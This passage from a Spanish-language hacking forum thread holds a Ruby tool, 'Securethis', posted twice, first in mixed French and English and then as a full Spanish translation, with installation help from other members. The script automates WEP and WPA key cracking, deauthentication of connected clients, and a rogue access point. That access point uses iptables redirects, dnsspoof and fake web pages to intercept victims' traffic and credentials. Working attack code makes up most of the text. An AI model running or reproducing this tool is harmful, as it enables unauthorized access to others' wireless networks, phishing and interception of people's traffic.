      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre reseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wepp
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wpadico
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
sleep 148
puts "Entrez le nom du dico a utiliser"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
end

def wparlocal
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "lancement de wireshark"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wparinternet
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def hostapd
  puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")
end

def deauth
  system ("ifconfig")
  puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")
carte=""
carte=gets.chomp
$carte=carte

system ("airmon-ng start #{$carte}")
sleep 6
system ("airodump-ng --encrypt wpa mon0")
puts("enter the channel of the target network (CH)")
canal=""
canal=gets.chomp
$canal=canal

puts("enter the adress of the target network (BSSID)")
bssid=""
bssid=gets.chomp
$bssid=bssid

puts("enter the name of the file capture in airodump")
name=""
name=gets.chomp
$name=name

system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")
sleep 5
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")
end

def planque
  puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"
sleep 15
system("airodump-ng --encrypt wpa mon0")
puts "Select the channel of the target network (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Select the bssid of the target network (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system("airodump-ng -c #{$ch} --bssid #{$bssid} mon0")

     puts "Rogue access point with parameters of the hidden network is in active mode, see airodump and wait for the name of this network"
sleep 10
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")
end

def metasploit
    puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"
sleep 20
system("msfconsole")
end

def clean
    puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"
sleep 20
`rm /var/www/index.php`
`rm /var/www/index.html`
`rm /var/www/valid.php`
`rm /var/www/*.css`
`rm /var/www/*.jpg`
`rm /var/www/*.ico`

puts "Now enter the name of your folder wich countain the fakes pages"
name=""
name=gets.chomp
$name=name

Dir.chdir '/root'
`cp -rv #{$name} /var/www`
end

def settings
  puts "CHECK and EDIT: Important file needed for a good crack"
sleep 10
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`
`gedit /etc/hostapd/hostapd.conf`
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`
end

begin
  puts
  loop do
    choose do |menu|
      menu.prompt = "Please select option"
  puts "##################    Coded By Flow (Koala)              #################"
  puts "##################    Securethis V1.1                    #################"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~Does your network is secure?~~~                            "
 
      menu.choice(:Wepinjection, "injection.") { wepinj() }
      menu.choice(:Wepp0841, "-p0841.") { wepp() }
      menu.choice(:Wpabruteforce, "attaque par dico.") { wpadico() }
      menu.choice(:RogueAPlocal, "Rogue local seulement.") { wparlocal() }
      menu.choice(:RogueAPinternet, "Rogue avec internet.") { wparinternet() }
      menu.choice(:Hostapd, "Hostapd.") { hostapd() }   
      menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() }
      menu.choice(:HiddenNetwork, "reseau caché.") { planque() }
      menu.choice(:Metasploit, "lancement de msfconsole.") { metasploit() }
      menu.choice(:CleanApache2WARNING, "supprime les fichier du crack.") { clean() }
      menu.choice(:Settings, "Boite a outils.") { settings() }
      menu.choice(:Quit, "Quitter le prog.") { exit }
    end
  end
end



Que disfrutais ;)
Título: Re:Securethis V1.0
Publicado por: kcdtv en Abril 11, 2013, 22:54:54 pm
Tengo un par de cosas más por si te aburres koala  ;D
Gracias compi  ;)

.... esta en franglish  ;D

Código: [Seleccionar]
puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5

Código: [Seleccionar]
puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")
Si quieres dejare una traducción al español  ;)
Título: Re:Securethis V1.0
Publicado por: koala63 en Abril 11, 2013, 23:09:48 pm
Citar
esta en franglish

Nuevo language  :D

Si puedes hacer la traduccion me encatare por que no soy espanol y no sé hablar muy bien ;)
Título: Re:Securethis V1.0
Publicado por: 1camaron1 en Abril 11, 2013, 23:18:20 pm
Koala63 buen trabajo :) y sigue aburriéndote  8)
Saludos!
Título: Re:Securethis V1.0
Publicado por: kcdtv en Abril 11, 2013, 23:20:13 pm
Será un placer echarte una mano, lo hago mañana por la mañana.
Le he echado un ojo, aún no he podido probarlo, me alegro de que se retome este tema  :)
Tengo en mente traducir al español los tutos  sobre rogue AP de antares en su bloc-notes para dar algo de bases teóricas.
Rogue n'roll (http://portalhacker.net/Smileys/classic/kool.gif)
   
Título: Re:Securethis V1.0
Publicado por: 1camaron1 en Abril 11, 2013, 23:23:54 pm
amigo kcdtv dándole caña a perl? ;) es un lenguaje bonito y parece que no es tan "engorroso" 
te veo dando pasos de gigante :)
Saludos.
Título: Re:Securethis V1.0
Publicado por: kcdtv en Abril 11, 2013, 23:33:15 pm
mmmm.... No creo,  :P  : No tengo ni idea de perl  ;D
koala había echo unas cosas en perl si no me confundo...
Título: Re:Securethis V1.0
Publicado por: koala63 en Abril 11, 2013, 23:43:21 pm
he tenido muchos problemos con perl, es un languaje que se va un poco en todo los lado... pero es mi aviso   8)

si no usas 'strict' and 'warning' con perl ojo...  :-\
Título: Re:Securethis V1.0
Publicado por: cenomeno1 en Abril 12, 2013, 08:12:44 am
buenas soy nuevo y hospido paciencia  con migo soy un poquito torpe  me gustaría saber como descargar esto y instalarlo en mi  programa que yo uso en linux  alguien tan amable meló explica paso ha paso selo agradecería 
no se si tengo que copiar el escrip ese i que hago con el
Título: Re:Securethis V1.0
Publicado por: koala63 en Abril 12, 2013, 09:30:17 am
Hola  ;)

Pienso que va a servir a los otros tambièn la explication.
En primero las dépendancias que neccesita el script, abres un terminal en root y hace eso:

Código: [Seleccionar]
sudo apt-get install ruby
sudo apt-get install rubygems1.8
sudo apt-get install rubygems1.9.1
sudo apt-get install libgtk2-ruby1.8

libgtk es para el futuro por que creo que cuando tiendré mas tiempo haré una version interactiva con mas option toda via.Tengo la version de ruby 1.9.3 pero no es nessecidad de tener lo.

En segundo, la installation de dhcp3-serve,r apache etc..., abres un terminal y empieza la como asi para initializar el script install.rb:

Código: [Seleccionar]
ruby install.rb
Hay que vigilar que todo se passa bien y responder "Y" por yes o "S" por si cuando el terminal te lo pedira.

Cuando has echo todo eso puedes initializar el script Securethis.rb de la misma forma que el install.rb:

Código: [Seleccionar]
ruby Securethis.rb
-Eliges tu red
-Para checkear que tiennes una buena configuracion antes de hacer algo, vas en "Setting"

Despues empiesas las investigaciones  :P
Título: Re:Securethis V1.0
Publicado por: cenomeno1 en Abril 12, 2013, 15:03:18 pm
no lo entiendo muy bien soy muy novato en todo esto i no se  perdonarme  si soy muí tozudo pero necesito alguna aclarazion  mas especializada para  gente como yo que no sabemos nada de como baesto
Título: Re:Securethis V1.0
Publicado por: maripuri en Abril 12, 2013, 15:11:07 pm
Sigue los pasos que te indica koala63 (saludos) y a partir de ahí si algo no va bien pues comentas resultados..
Título: Re:Securethis V1.0
Publicado por: MEGAHOM en Abril 12, 2013, 15:15:18 pm
no lo entiendo muy bien soy muy novato en todo esto i no se  perdonarme  si soy muí tozudo pero necesito alguna aclarazion  mas especializada para  gente como yo que no sabemos nada de como baesto

Esto es para linux NO para Windows

Un saludo
Título: Re:Securethis V1.0
Publicado por: maripuri en Abril 12, 2013, 15:27:31 pm

Cita de: MEGAHOM
Esto es para linux NO para Windows

Cita de: cenomeno1
como descargar esto y instalarlo en mi  programa que yo uso en linux
Está usando linux.. o eso dice.
Título: Re:Securethis V1.0
Publicado por: tio95 en Abril 12, 2013, 15:47:00 pm
Por qué siempre lo interesante y lo bueno sale en Linux :( :( :(
Título: Re:Securethis V1.0
Publicado por: kcdtv en Abril 12, 2013, 17:28:43 pm
Porque en lugar de quejarte no arrimas el hombro si te gusta windows y haces algo al respecto si te parece que "lo bueno sale en linux"
Un rogue AP con un atheros o un rtl8187l se puede hacer perfectamente bajo windows.
La historia es ir haciéndolo una vez y luego si quieres hacer un script para automatizar los pasos.

No desviemos el hilo con preguntas que no tienen su sitio aquí, abrir un hilo en offtopic si quieres hablar de windows - linux - código libre - Bill Gate etc...
Título: Re:Securethis V1.0
Publicado por: cenomeno1 en Abril 12, 2013, 18:02:06 pm
he seguido los pasos que medio  koala63 pero no nada nos encuentra nada mas medie
Título: Re:Securethis V1.0
Publicado por: maripuri en Abril 12, 2013, 18:15:09 pm
Citar
he seguido los pasos que medio  koala63 pero no nada nos encuentra nada mas medie
Buenas.. ¿no te das cuenta que con los datos que aportas nadie va a saber que te sucede? ¿como saber que errores te devuelve o lo que realmente sucede sin estar delante de tu PC? ¿o los pasos que das.. exactamente?  A mi ni me viene ni me va.. pero nadie puede ayudarte si solo comentas "he seguido los pasos que medio  koala63 pero no nada nos encuentra nada mas medie"   ::)


..es eso o recuperar la bola de cristal del foro (empeñada por culpa de la crisis) y para esto último recursos humanos dice que no hay dinero aún.

(http://img267..us/img267/4861/boladecristaldelforo.jpg)
Título: Re:Securethis V1.0
Publicado por: koala63 en Abril 12, 2013, 19:31:02 pm
Hola ;)

A ver, que teneis como error?
Título: Re:Securethis V1.0
Publicado por: kcdtv en Abril 12, 2013, 19:49:02 pm
Traducido al español  ;)




install.rb

Código: [Seleccionar]
#!/usr/bin/env ruby
# encoding: utf-8

puts "Este script instalará las dependencias necesarias al funcionamiento de Securethis, solo teneís que estar atento en cuando el terminal le pregunta Y para Yes (si) y N para No. El tiempo de instalación dependera de la calidad de su conexión y de su computadora, podeís ajustar el tiempo entre cada instalación modificando el valor de los comandos "sleep" a dentro del script con un editor de texto, nano, gedit, mousepad, leafpad etc..."
sleep 60
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install dsniff &> /dev/null &")
      sleep 60
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install wireshark &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install dhcp3-server &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install apache2 &> /dev/null &")
      sleep 150
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install libapache2-mod-php5 &> /dev/null &")
`sudo a2enmod php5`
`sudo service apache2 restart`
`sudo gem install --no-rdoc --no-ri highline`
 



Securethis.rb

Código: [Seleccionar]
#!/usr/bin/env ruby
# encoding: utf-8

require "rubygems"
require "highline/import"

puts "Elegir su objetivo con airodump-ng y prensar ctrl+c para el paso siguiente"
sleep 10
system ("airmon-ng start wlan0")
sleep 5
system ("airodump-ng mon0")

def wepinj
system ("ifconfig")
      puts "Ahora entrar cuidadosamente la dirección mac de su objetivo"
mac=""
mac=gets.chomp
$mac=mac

puts "El escaneo de redes se va a iniciar, elegir su objetivo y prensar ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Introducir un nombre para el fichero de capturas"
nom=""
nom=gets.chomp
$nom=nom

     puts "Entrar el nombre de la red (eSSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Introducir el canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Introducir la dirección mac de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wepp
system ("ifconfig")
      puts "Ahora elegir su dirrección MAC y prensar Enter, tener mucho cuidado cuando entréis la dirección mac"
mac=""
mac=gets.chomp
$mac=mac

puts "El escaneo de redes se va a iniciar, elegir su objetivo y prensar ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Introducir un nombre para el fichero de capturas"
nom=""
nom=gets.chomp
$nom=nom

     puts "Entrar el nombre de la red (eSSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Introducir canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Introducir dirección mac de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wpadico
  puts "El escaneo de redes se va a iniciar, elegir su objetivo y prensar ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Introducir un nombre para el fichero de capturas"
nom=""
nom=gets.chomp
$nom=nom

     puts "Entrar el nombre de la red (eSSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Introducir canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Introducir dirección mac de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Entrar mac del cliente (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
sleep 148
puts "Entrar nombre del diccionario a utilizar"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
end

def wpalocal
  puts "El escaneo de redes se va a iniciar, elegir su objetivo y prensar ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Introducir nombre de la red (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Introducir canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Introducir dirección mac de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creación de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Reglas iptables establecidas, reinicio de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Activación y configuración de apache y dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "Lanzamiento de wireshark"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wparinternet
  puts "El escaneo de redes se va a iniciar, elegir su objetivo y prensar ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Introducir nombre red (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Introducir canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Introducir la dirrección (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creación de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
     puts "Reglas iptables establecidas, reinicio de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "configuración y lanzamiento de apache y dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def hostapd
  puts("Punto de acsesso en modo "Hostpad". Adaptado para hacer un MITM discreto. Asegúrense de que su fichero hostpad.conf es correctamente configurado y que la ruta hacía el fichero es la correcta. Para empezar, cambiar la linea driver=hostapd por la siguiente driver=nl80211)")
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")
end

def deauth
  system ("ifconfig")
  puts("Elegir la interfaz para efectuar el ataque de desautenticación  (prensar Enter si nquereís uzar la misma interfaz que la empleada para realizar su Punto de Acceso Rogue)")
carte=""
carte=gets.chomp
$carte=carte

system ("airmon-ng start #{$carte}")
sleep 6
system ("airodump-ng --encrypt wpa mon0")
puts("Entrar el canal de la red objetivo (CH)")
canal=""
canal=gets.chomp
$canal=canal

puts("Entrar dirección mac de la red objetivo (BSSID)")
bssid=""
bssid=gets.chomp
$bssid=bssid

puts("entrar el nombre del fichero de captura airodump-ng")
name=""
name=gets.chomp
$name=name

system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")
sleep 5
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")
end

def planque
  puts "Airbase es capaz de encontrar las redes ocultas, solo esperen un poco y la red va a aparecer en su ventana airodump-ng"
sleep 15
system("airodump-ng --encrypt wpa mon0")
puts "Seleccionar el canal de la red objetivo (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Seleccionar la dirección mac del objetivo (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system("airodump-ng -c #{$ch} --bssid #{$bssid} mon0")

     puts "El punto de acceso Rogue con los parámetros de la red oculta esta en modo activo, vigilar su ventana airodump-ng y esperar a que aparezca el nombre de la red objetivo "
sleep 10
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")
end

def metasploit
    puts "ANTES de ejecutar metasploit, si uzaís ubuntu o otra plataforma linux gran publico, asegúrense de tener todas las librerías necesarias al funcionamiento de metalsploit. El lanzamiento de la consola msfconsole puede tardar algo de tiempo... paciencia. Para volver al menú de securtethis, prensar exit en el terminal msfconsole"
sleep 20
system("msfconsole")
end

def clean
    puts "Borrar su fichero index.html y php y todos losl css presentes en  /var/www y poner en su sitio los nuevos ficheros que habéis elegido. Prensar CTRL+C Para parrar inmediatamente !"
sleep 20
`rm /var/www/index.php`
`rm /var/www/index.html`
`rm /var/www/valid.php`
`rm /var/www/*.css`
`rm /var/www/*.jpg`
`rm /var/www/*.ico`

puts "Entrar nombre de la carpeta contenedora de las paginas falsas"
name=""
name=gets.chomp
$name=name

Dir.chdir '/root'
`cp -rv #{$name} /var/www`
end

def settings
  puts "COMPRUEBA y EDITA: los ficheros importantes necesarios a un buen crack"
sleep 10
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`
`gedit /etc/hostapd/hostapd.conf`
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`
end

begin
  puts
  loop do
    choose do |menu|
      menu.prompt = "Por favor, elegir una opción"
  puts "##################    Coded By Flow (Koala)              #################"
  puts "##################    Securethis V1.1                    #################"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~¿Es su red segura?~~~                            "
 
      menu.choice(:Wepinjection, "inyección.") { wepinj() }
      menu.choice(:Wepp0841, "-p0841.") { wepp() }
      menu.choice(:Wpabruteforce, "ataque diccionario.") { wpadico() }
      menu.choice(:RogueAPlocal, "Rogue local unicamente.") { wparlocal() }
      menu.choice(:RogueAPinternet, "Rogue con internet.") { wparinternet() }
      menu.choice(:Hostapd, "Hostapd.") { hostapd() }   
      menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() }
      menu.choice(:HiddenNetwork, "red escondida.") { planque() }
      menu.choice(:Metasploit, "lanzamiento terminal msfconsole.") { metasploit() }
      menu.choice(:CleanApache2WARNING, "eleminar los ficheros del crack.") { clean() }
      menu.choice(:Settings, "Caja de herramientas.") { settings() }
      menu.choice(:Quit, "Salir del programa.") { exit }
    end
  end
end

 



Esta frase la he traducido "petit-nègre"  ya que no la he entendido del todo...  :P
Citar
puts "CHECK and EDIT: Important file needed for a good crack"


@  cenomeno1
Citar
he seguido los pasos que medio  koala63
No le tengas "medio" a koala, solo come eucalipto  ;D
